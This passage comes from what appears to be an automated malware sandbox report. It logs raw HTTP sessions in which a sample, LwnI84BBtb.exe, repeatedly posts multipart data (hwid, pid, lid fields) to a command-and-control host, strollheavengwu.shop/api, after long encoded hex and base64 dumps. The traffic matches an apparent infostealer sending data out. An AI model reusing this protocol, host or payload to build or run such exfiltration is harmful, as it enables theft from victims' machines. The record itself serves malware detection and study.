                                                  2024-04-20 20:06:59 UTC1369INData Raw: 39 44 6b 57 41 67 79 32 47 6c 2b 6d 34 68 56 73 57 35 31 79 71 64 4b 4a 75 66 55 33 68 65 65 79 77 37 72 36 52 65 42 71 73 31 77 76 34 52 43 63 6b 75 77 4c 58 65 62 69 45 4f 62 52 52 36 45 72 46 6c 68 74 4a 32 61 4e 6f 6e 46 46 65 50 6b 58 75 58 4a 33 6a 6e 46 34 6c 34 53 4b 74 4a 6f 66 4a 72 4c 43 64 6f 45 58 73 54 49 4f 51 33 2f 6b 59 5a 79 30 59 70 65 79 74 6c 67 79 6f 47 36 56 63 69 68 4d 33 45 35 73 77 59 62 31 38 38 58 6d 56 31 63 79 71 46 61 59 62 47 53 6a 44 79 62 78 68 6e 74 37 46 2f 68 78 74 34 77 32 66 31 54 47 79 44 56 59 6e 69 65 7a 42 72 64 41 52 4b 4e 34 42 77 4f 31 50 33 65 4e 5a 47 49 52 71 2b 71 66 2b 72 62 79 48 7a 35 35 46 73 64 4d 4d 31 32 4d 50 2b 6a 42 4a 64 74 64 5a 50 49 4f 51 33 2f 6b 5a 4a 79 30 59 70 65 36 65 46 64 34 4d 4c 62
                                                  Data Ascii: 9DkWAgy2Gl+m4hVsW51yqdKJufU3heeyw7r6ReBqs1wv4RCckuwLXebiEObRR6ErFlhtJ2aNonFFePkXuXJ3jnF4l4SKtJofJrLCdoEXsTIOQ3/kYZy0YpeytlgyoG6VcihM3E5swYb188XmV1cyqFaYbGSjDybxhnt7F/hxt4w2f1TGyDVYniezBrdARKN4BwO1P3eNZGIRq+qf+rbyHz55FsdMM12MP+jBJdtdZPIOQ3/kZJy0Ype6eFd4MLb
                                                  2024-04-20 20:06:59 UTC955INData Raw: 49 5a 4c 4e 31 73 66 70 66 47 47 35 6c 4c 64 75 48 4c 45 6d 47 6e 31 73 5a 77 79 65 67 56 2b 2f 39 55 2b 63 66 56 4d 70 65 48 4d 41 56 75 73 77 5a 70 2f 36 4e 77 6d 51 49 53 79 76 67 51 4a 72 47 45 6d 6a 4f 4a 77 42 66 68 34 56 2f 37 78 74 55 31 32 65 46 51 48 69 7a 53 5a 6e 6d 53 78 42 72 53 44 42 75 4f 71 6c 52 72 2f 39 6a 32 57 65 4b 49 47 66 57 71 44 36 75 42 2f 6a 33 59 35 42 74 79 53 38 51 6a 47 50 7a 52 63 37 4a 75 58 6f 32 73 45 6a 37 39 31 70 6b 36 67 63 59 64 36 2b 46 62 35 63 44 62 4f 4e 4c 6e 58 42 55 6e 30 6d 70 77 6b 64 6f 63 31 41 77 65 67 61 6c 59 59 72 36 64 33 6e 7a 68 6f 33 57 74 37 55 2b 70 6d 5a 42 2b 35 65 68 4e 43 69 4f 62 42 52 75 49 68 6e 43 78 62 67 66 69 79 7a 6b 6d 75 4a 72 65 61 73 75 49 45 2f 2f 72 55 76 76 46 33 54 58 46 35
                                                  Data Ascii: IZLN1sfpfGG5lLduHLEmGn1sZwyegV+/9U+cfVMpeHMAVuswZp/6NwmQISyvgQJrGEmjOJwBfh4V/7xtU12eFQHizSZnmSxBrSDBuOqlRr/9j2WeKIGfWqD6uB/j3Y5BtyS8QjGPzRc7JuXo2sEj791pk6gcYd6+Fb5cDbONLnXBUn0mpwkdoc1AwegalYYr6d3nzho3Wt7U+pmZB+5ehNCiObBRuIhnCxbgfiyzkmuJreasuIE//rUvvF3TXF5
                                                  2024-04-20 20:06:59 UTC1369INData Raw: 32 33 66 39 0d 0a 2f 6d 72 74 41 63 4c 4b 33 6b 7a 33 4a 6f 48 58 79 70 44 2b 43 32 4c 70 56 76 4b 39 63 46 6d 43 44 4c 7a 43 65 32 68 2f 55 46 78 65 4e 72 6c 31 6c 72 5a 65 54 4f 5a 76 50 45 65 6e 74 57 2b 2f 4f 31 44 2f 53 35 56 63 64 4a 64 42 69 66 4e 65 47 63 37 4a 75 58 6f 32 34 45 6a 37 39 31 72 41 35 6d 74 38 64 34 2b 46 42 38 6f 47 36 56 63 69 68 4d 33 45 35 73 77 59 62 31 38 38 58 6d 56 31 63 79 71 4e 5a 62 62 75 57 6b 6a 4b 4e 78 52 37 2f 35 56 44 75 79 4e 6b 73 33 65 68 63 45 53 6a 51 59 6e 61 46 78 42 58 4c 41 41 79 59 34 42 77 4f 31 50 33 65 4e 5a 47 49 52 71 2b 71 59 65 37 52 77 6a 32 56 33 6b 30 5a 4e 74 42 67 66 4e 65 67 63 4d 5a 4c 64 75 47 35 4f 67 33 55 31 70 6b 2b 79 5a 42 63 72 65 78 59 34 4d 4c 64 50 39 37 6a 56 68 38 70 33 6d 78 32
                                                  Data Ascii: 23f9/mrtAcLK3kz3JoHXypD+C2LpVvK9cFmCDLzCe2h/UFxeNrl1lrZeTOZvPEentW+/O1D/S5VcdJdBifNeGc7JuXo24Ej791rA5mt8d4+FB8oG6VcihM3E5swYb188XmV1cyqNZbbuWkjKNxR7/5VDuyNks3ehcESjQYnaFxBXLAAyY4BwO1P3eNZGIRq+qYe7Rwj2V3k0ZNtBgfNegcMZLduG5Og3U1pk+yZBcrexY4MLdP97jVh8p3mx2
                                                  2024-04-20 20:06:59 UTC1369INData Raw: 45 50 58 73 54 49 4f 51 33 2f 6b 59 5a 79 30 59 70 65 77 65 6c 47 34 34 50 31 4a 4d 48 6f 56 77 73 72 31 6d 45 77 2f 36 4d 45 6c 32 31 31 6b 38 67 35 44 66 2b 52 6b 6e 4c 52 69 6c 37 74 36 31 72 37 78 4e 4d 30 33 65 4a 54 46 53 58 65 59 6e 53 54 77 78 58 4c 43 78 47 4b 70 6c 6c 6e 75 70 57 56 4f 49 66 42 44 4b 32 6b 50 34 4b 71 6b 6a 6e 50 72 77 4e 59 59 50 46 32 63 5a 72 45 57 66 63 4f 43 49 33 69 63 32 69 30 6b 5a 49 6b 79 61 42 31 38 71 51 2f 67 74 69 36 56 62 79 76 58 42 5a 67 67 79 38 77 6e 73 59 58 32 67 49 57 67 71 56 53 62 62 2b 5a 6c 44 79 4f 32 68 54 68 34 45 58 6d 77 74 38 36 32 75 56 65 45 7a 4c 65 5a 48 62 58 68 6e 4f 79 62 6c 36 4e 75 42 49 2b 2f 64 61 6d 4f 59 66 36 48 66 61 71 50 34 4c 65 6e 46 61 38 39 6a 4e 78 53 35 74 71 66 4e 65 51 57
                                                  Data Ascii: EPXsTIOQ3/kYZy0YpewelG44P1JMHoVwsr1mEw/6MEl211k8g5Df+RknLRil7t61r7xNM03eJTFSXeYnSTwxXLCxGKpllnupWVOIfBDK2kP4KqkjnPrwNYYPF2cZrEWfcOCI3ic2i0kZIkyaB18qQ/gti6VbyvXBZggy8wnsYX2gIWgqVSbb+ZlDyO2hTh4EXmwt862uVeEzLeZHbXhnOybl6NuBI+/damOYf6HfaqP4LenFa89jNxS5tqfNeQW
                                                  2024-04-20 20:06:59 UTC1369INData Raw: 69 79 30 30 6f 31 2f 32 48 57 75 4b 6a 58 75 72 6d 46 37 47 44 6b 6a 58 59 34 56 59 52 4a 4e 4a 6f 65 4a 54 4e 48 74 4d 4a 45 6f 75 6f 57 32 79 36 6b 35 67 34 69 73 59 52 37 4f 5a 54 34 4d 2f 62 66 70 6d 48 4d 48 46 67 33 48 55 77 7a 34 70 62 37 78 55 5a 6b 71 31 43 4a 49 32 56 6a 79 4f 63 78 51 37 72 71 48 6a 71 7a 64 45 37 30 50 38 62 63 6b 76 45 49 78 6a 38 30 58 4f 79 62 6c 36 4e 72 42 49 2b 2f 64 61 65 4e 6f 58 4c 47 65 50 6c 57 75 62 47 32 54 48 64 34 55 6b 56 4a 64 4e 68 65 4a 72 61 45 64 4d 58 46 34 4f 74 58 47 36 74 6c 64 35 38 34 61 4e 31 72 65 31 50 71 5a 6d 51 66 75 58 6c 57 42 59 32 31 6d 49 77 2f 36 4d 45 6c 32 31 31 6b 38 67 35 44 66 2b 52 6b 6e 4c 52 69 6c 37 2f 2b 46 66 69 77 64 55 77 78 65 35 54 46 53 72 62 61 33 75 64 79 78 4c 64 43 78
                                                  Data Ascii: iy00o1/2HWuKjXurmF7GDkjXY4VYRJNJoeJTNHtMJEouoW2y6k5g4isYR7OZT4M/bfpmHMHFg3HUwz4pb7xUZkq1CJI2VjyOcxQ7rqHjqzdE70P8bckvEIxj80XOybl6NrBI+/daeNoXLGePlWubG2THd4UkVJdNheJraEdMXF4OtXG6tld584aN1re1PqZmQfuXlWBY21mIw/6MEl211k8g5Df+RknLRil7/+FfiwdUwxe5TFSrba3udyxLdCx
                                                  2024-04-20 20:06:59 UTC1369INData Raw: 4b 4e 66 39 39 58 4b 62 69 45 61 76 71 68 44 71 30 38 41 34 31 50 6c 59 58 52 37 6c 54 6d 65 42 77 67 43 62 49 78 6d 62 71 55 52 72 72 61 69 67 48 49 54 4a 48 65 4f 6f 5a 76 2f 4d 77 6a 33 53 36 47 55 6b 4c 74 78 35 64 35 6e 4f 47 35 6c 4c 64 75 48 4c 45 6d 6e 2f 7a 74 77 4c 79 59 42 65 30 71 51 2f 67 71 71 53 4a 70 65 33 47 56 6f 56 32 47 4e 2b 6b 4e 34 4b 6c 43 59 4a 6e 4b 70 4a 4a 4a 6d 52 6a 7a 75 66 78 51 79 74 70 44 2b 43 71 70 49 34 6c 37 63 5a 53 6d 36 7a 42 68 76 58 7a 41 71 5a 58 56 7a 61 38 67 6b 7a 37 4d 48 4f 59 4f 47 6a 41 61 4f 43 50 50 43 70 75 56 57 58 2b 52 74 43 59 6f 6b 6a 47 50 79 6a 57 38 74 46 52 73 6a 67 46 57 57 74 68 4a 67 78 6e 38 74 5a 30 39 52 33 34 74 66 54 4d 39 7a 6a 5a 53 51 31 32 47 4e 2b 6b 4e 34 4b 6d 55 74 32 34 63 73
                                                  Data Ascii: KNf99XKbiEavqhDq08A41PlYXR7lTmeBwgCbIxmbqURrraigHITJHeOoZv/Mwj3S6GUkLtx5d5nOG5lLduHLEmn/ztwLyYBe0qQ/gqqSJpe3GVoV2GN+kN4KlCYJnKpJJJmRjzufxQytpD+CqpI4l7cZSm6zBhvXzAqZXVza8gkz7MHOYOGjAaOCPPCpuVWX+RtCYokjGPyjW8tFRsjgFWWthJgxn8tZ09R34tfTM9zjZSQ12GN+kN4KmUt24cs


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449732104.21.15.1984437396C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-20 20:07:00 UTC286OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 18161
                                                  Host: strollheavengwu.shop
                                                  2024-04-20 20:07:00 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 34 44 44 31 37 41 31 30 33 44 45 46 46 35 46 35 45 45 36 46 31 43 37 34 32 43 31 43 39 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F54DD17A103DEFF5F5EE6F1C742C1C9F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                  2024-04-20 20:07:00 UTC2830OUTData Raw: 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f
                                                  Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?
                                                  2024-04-20 20:07:00 UTC812INHTTP/1.1 200 OK
                                                  Date: Sat, 20 Apr 2024 20:07:00 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=efchmljkup6e0ep8joobqac6ra; expires=Wed, 14-Aug-2024 13:53:39 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ywD56qTV4N6hu4rGAihSyE3lFLuPS2qDQE8oig3oNv9gEfl7p8UsrYnYyf%2B650bK6flBNOEb%2Bv2OhVgVFYF8gALvDKFuGeWTzYw%2BsiTEDGZ9OBfBRQJnAF8%2FYXw%2Fc2QB55CMI4kRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8777c2118b3bb097-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-20 20:07:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                  Data Ascii: fok 81.181.57.52
                                                  2024-04-20 20:07:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449733104.21.15.1984437396C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-20 20:07:00 UTC285OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 8782
                                                  Host: strollheavengwu.shop
                                                  2024-04-20 20:07:00 UTC8782OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 34 44 44 31 37 41 31 30 33 44 45 46 46 35 46 35 45 45 36 46 31 43 37 34 32 43 31 43 39 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F54DD17A103DEFF5F5EE6F1C742C1C9F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                  2024-04-20 20:07:01 UTC806INHTTP/1.1 200 OK
                                                  Date: Sat, 20 Apr 2024 20:07:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=k6v7lqivpqfo2hbndl2b1pbupg; expires=Wed, 14-Aug-2024 13:53:40 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wmxPTOz7eXuGXfETufS8yWnXKQ5BETPrNOzp6oYs0m7uiL7t8B9gonui1TH6WpVgN0w2il3soEY1aWgfv4YytdiVDMLDjOIFOlyrpcLgpljXbmUp6fLXcqF%2BX0JcwQ3%2BOyCVeFNaKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8777c216ffbb53b5-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-20 20:07:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                  Data Ascii: fok 81.181.57.52
                                                  2024-04-20 20:07:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.449734104.21.15.1984437396C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-20 20:07:01 UTC286OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 20435
                                                  Host: strollheavengwu.shop
                                                  2024-04-20 20:07:01 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 34 44 44 31 37 41 31 30 33 44 45 46 46 35 46 35 45 45 36 46 31 43 37 34 32 43 31 43 39 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F54DD17A103DEFF5F5EE6F1C742C1C9F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                  2024-04-20 20:07:01 UTC5104OUTData Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00
                                                  Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                  2024-04-20 20:07:02 UTC808INHTTP/1.1 200 OK
                                                  Date: Sat, 20 Apr 2024 20:07:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=2rrblksvprprcnabn21jvtglt6; expires=Wed, 14-Aug-2024 13:53:41 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9PSBDCfygfmc9PNVDrDh53QJ6io0wh9ws4tyqdEENDnn8WpeTUrd1XMwsXdKqgZS1ROPtQwyDpoRdGdAN3TqkNOrJ8nYVI7Ioze9L5i5AsG%2BIvlJgyT0muTd2a7%2FWy4LbP%2BrStcYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8777c21cc8017bdb-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-20 20:07:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                  Data Ascii: fok 81.181.57.52
                                                  2024-04-20 20:07:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.449735104.21.15.1984437396C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-20 20:07:02 UTC285OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 3792
                                                  Host: strollheavengwu.shop
                                                  2024-04-20 20:07:02 UTC3792OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 34 44 44 31 37 41 31 30 33 44 45 46 46 35 46 35 45 45 36 46 31 43 37 34 32 43 31 43 39 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F54DD17A103DEFF5F5EE6F1C742C1C9F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                  2024-04-20 20:07:03 UTC812INHTTP/1.1 200 OK
                                                  Date: Sat, 20 Apr 2024 20:07:03 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=553q6mtu1nck5a7afo7mt8lequ; expires=Wed, 14-Aug-2024 13:53:42 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DuFCW7We17%2BRQMViW4ahf6P0YkW6x4fLDgcZKwCVs%2F2npWBY%2BXW2ca6dd07kN0W07r0GDjU1C4EUv%2BThKf51Mt3QUN2x8ROTF%2FUWPZUL9Gxrd0EnxAwcNVbFjq3ThlysC43b3ocHpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8777c2235ae212d3-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-20 20:07:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                  Data Ascii: fok 81.181.57.52
                                                  2024-04-20 20:07:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449736104.21.15.1984437396C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-20 20:07:03 UTC285OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 1391
                                                  Host: strollheavengwu.shop
                                                  2024-04-20 20:07:03 UTC1391OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 34 44 44 31 37 41 31 30 33 44 45 46 46 35 46 35 45 45 36 46 31 43 37 34 32 43 31 43 39 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F54DD17A103DEFF5F5EE6F1C742C1C9F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                  2024-04-20 20:07:04 UTC814INHTTP/1.1 200 OK
                                                  Date: Sat, 20 Apr 2024 20:07:04 GMT
